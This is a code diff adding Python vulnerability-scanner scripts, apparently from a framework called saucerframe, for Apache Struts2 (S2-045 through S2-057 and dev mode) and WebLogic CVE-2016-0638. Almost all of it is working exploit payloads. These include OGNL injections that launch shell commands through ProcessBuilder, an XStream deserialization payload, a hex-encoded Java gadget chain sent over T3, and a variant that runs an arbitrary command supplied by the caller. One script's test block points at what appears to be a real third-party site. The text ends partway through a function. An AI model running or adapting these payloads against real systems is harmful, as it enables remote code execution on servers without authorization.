 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    # print(url)
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    check = [ 'Struts2-vuln-Goop1116', '<Struts2-vuln-Goop>']
    poc_goop = [
        r"%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('<'+'Struts2-vuln-'+'Goop>')).(#o.close())}",
        r"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#path=#req.getRealPath('Struts2-vuln-Goop'+'1116')).(#o.println(#path)).(#o.close())}",
        r'''%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath("Struts2-vuln-Goop"+"1116"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'''
    ]
    try:
        for test in poc_goop:
            headers_045_all = {
                "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
                "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
                "Content-Type": test
            }
            req = requests.get(url, headers=headers_045_all, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-045, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    # print(str(c))
                    return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://xc.96818.com.cn:80/ydauto/sysUser_toshowallRoleAndall4Sre.action")
    print(a)
 # test_url ='http://127.0.0.1:8080/struts2-showcase/fileupload/doUpload.action'
 # "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('Struts2-vuln-Goop')).(#o.close())}"
--- a/saucerframe/scripts/struts2_046.py
+++ b/saucerframe/scripts/struts2_046.py
@@ -0,0 +1,50 @@
 import warnings
 import requests
 import random
 import http.client as httplib
 warnings.filterwarnings("ignore")
 httplib.HTTPConnection._http_vsn = 10
 httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', '<Struts2-vuln-Goop>',
             'Struts2-vuln-Goop1116', 'Unable to initialize device PRN']
    boundary_046 = "---------------------------735323031399963166993862150"
    headers_046 = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Content-Type': 'multipart/form-data; boundary=' + boundary_046 + ''}
    poc_goop = [
        r"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='print goop').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
        r"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + lin + r"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
        r"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('<'+'Struts2-vuln-'+'Goop>')).(#o.close())}",
        r"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#path=#req.getRealPath('Struts2-vuln-Goop')).(#o.print(#path)).(#o.print(1116)).(#o.close())}"
    ]
    try:
        for test in poc_goop:
            data_046 = '--' + boundary_046 + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + test + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary_046 + "--"
            req = requests.post(url, headers=headers_046, data=data_046, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-046, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    # print(str(c))
                    return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8046")
    print(a)
 # test_url ='http://127.0.0.1:8080/struts2-showcase/fileupload/doUpload.action'
--- a/saucerframe/scripts/struts2_048.py
+++ b/saucerframe/scripts/struts2_048.py
@@ -0,0 +1,48 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    ran_number = '${%d-%d}' % (ran_a, ran_b)
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Unable to initialize device PRN']
    poc_goop = [
        r"${(#dm=@\u006Fgnl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#ef='print goop').(#iswin=(@\u006Aava.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#efe=(#iswin?{'cmd.exe','/c',#ef}:{'/bin/bash','-c',#ef})).(#p=new \u006Aava.lang.ProcessBuilder(#efe)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
        ran_number
    ]
    headers_048 = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            data_048 = {
                "name": test,
                "age": 111,
                "bustedBefore": "true",
                "__checkbox_bustedBefore": "true",
                "description": 111,
            }
            req = requests.post(url, data=data_048, headers=headers_048, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-048, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    # print(str(c))
                    return result
    except:
        pass
 # test_url ='http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action'
--- a/saucerframe/scripts/struts2_048_1.py
+++ b/saucerframe/scripts/struts2_048_1.py
@@ -0,0 +1,44 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check]
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    data_048 = {
        "name": r"%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=#parameters.cmd[0]).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
        "cmd": lin,
        "age": 111,
        "bustedBefore": "true",
        "__checkbox_bustedBefore": "true",
        "description": 111,
    }
    headers_048 = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        req = requests.post(url, data=data_048, headers=headers_048, timeout=timeout, verify=False, )
        result = "目标存在 Struts2-048, check url: %s" % url
        for c in check:
            if str(c) in req.text:
                print(str(c))
                return result
    except:
        pass
 # test_url ='http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action'
--- a/saucerframe/scripts/struts2_052.py
+++ b/saucerframe/scripts/struts2_052.py
@@ -0,0 +1,29 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    poc_goop = r'''<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>echo Struts2-echo-Goop</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>'''
    headers_052 = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/xml"
    }
    try:
        req = requests.post(url, data=poc_goop, headers=headers_052, timeout=timeout, verify=False, )
        result = "目标存在 Struts2-052, check url: %s" % url
        if req.status_code == 500 and r"java.security.Provider$Service" in req.text:
            return result
    except:
        pass
 # test_url ='http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action'
--- a/saucerframe/scripts/struts2_053.py
+++ b/saucerframe/scripts/struts2_053.py
@@ -0,0 +1,45 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    ran_number = '%25' + '%7b' + '%d-%d' % (ran_a, ran_b) + '%7d'
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    params = [
        "id",
        "name",
        "filename",
        "searchword"
        "username",
        "password",
        "stRegion"
    ]
    try:
        for param in params:
            vulnurl = url + "?" + param + "=" + ran_number
            req = requests.get(vulnurl, headers=headers, timeout=timeout, verify=False, )
            if str(ran_check) in req.text:
                result = "目标存在 Struts2-053, check url: %s" % url + '  ' + 'poc:' + param + "=" + ran_number
                return result
    except:
        pass
 # test_url ='http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action'
 # exp = r'''%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3d%27whoami%27).(%23iswin%3d(%40java.lang.System%40getProperty(%27os.name%27).toLowerCase().contains(%27win%27))).(%23cmds%3d(%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d)).(%23p%3dnew+java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3d%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7d'''
--- a/saucerframe/scripts/struts2_057.py
+++ b/saucerframe/scripts/struts2_057.py
@@ -0,0 +1,51 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 # @Time    : 2019/5/11 20:24
 # @Author  : Goop
 # @Site    : 
 # @File    : struts2_057.py
 # @Software: PyCharm
 import requests
 import random
 from urllib.parse import urlparse
 from plugin.urlparser import iterate_path, get_domain
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    domain = get_domain(url)
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
    }
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    parser = urlparse(url)
    if parser.path:
        _path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
    else:
        _path_list = 'index.action'
    url_list = iterate_path(url)
    for urls in url_list:
        url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
        try:
            res = requests.get(url, timeout=timeout, headers=headers, allow_redirects=False, verify=False, )
            if res.status_code == 302 and res.headers.get('Location') is not None and str(ran_check) in res.headers.get(
                    'Location'):
                urlLoca = res.headers.get('Location')
                res2 = requests.get(domain + urlLoca, headers=headers, timeout=6, allow_redirects=False, verify=False)
                if str(ran_check) in res2.text:
                    result = "目标存在 Struts2-057, check url: %s" % url
                    return result
        except:
            pass
 if __name__ == '__main__':
    poc('http://192.168.106.130:8080')
--- a/saucerframe/scripts/struts2_dev.py
+++ b/saucerframe/scripts/struts2_dev.py
@@ -0,0 +1,40 @@
 import warnings
 import requests
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    check = ['Struts2-vuln-Goop1116', '-Struts2-vuln-Goop']
    poc_goop = [
        r"debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().print(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D)))(#context[#parameters.rpsobj[0]].getWriter().print(1116)):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=Struts2-vuln-Goop&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest",
        r"debug=browser&object=%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2c%23res%3d@org.apache.struts2.ServletActionContext@getResponse%28%29%2c%23w%3d%23res.getWriter%28%29%2c%23w.print%28%27-Struts2-vuln%27%2b%27-Goop%27%29%29",
        r"debug=browser&object=(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),%23w.print(1116))&pp=Struts2-vuln-Goop"
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req_get = requests.get(url + '?' + test, headers=headers, timeout=timeout, verify=False, )
            req_post = requests.post(url, data=test, headers=headers, timeout=timeout, verify=False, )
            req_list = [req_get.text, req_post.text]
            result = "目标存在 Struts2-dev, check url: %s" % url
            for c in check:
                for text in req_list:
                    if str(c) in text:
                        return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8080/ajax/example5.action")
    print(a)
--- a/saucerframe/scripts/weblogic_2015-4852.py
+++ b/saucerframe/scripts/weblogic_2015-4852.py
--- a/saucerframe/scripts/weblogic_2016-0638.py
+++ b/saucerframe/scripts/weblogic_2016-0638.py
@@ -0,0 +1,109 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import socket
 import time
 import re
 import math
 import requests
 VUL = ['CVE-2016-0638']
 PAYLOAD = [
    'aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78',
    # 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870',
    # 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'
 ]
 VER_SIG = ['weblogic.jms.common.StreamMessageImpl']
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
 }
 def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    # print(sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')))
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock, rport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        # print(sock.send(d.decode('hex')))
        sock.send(bytes.fromhex(d))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock, data):
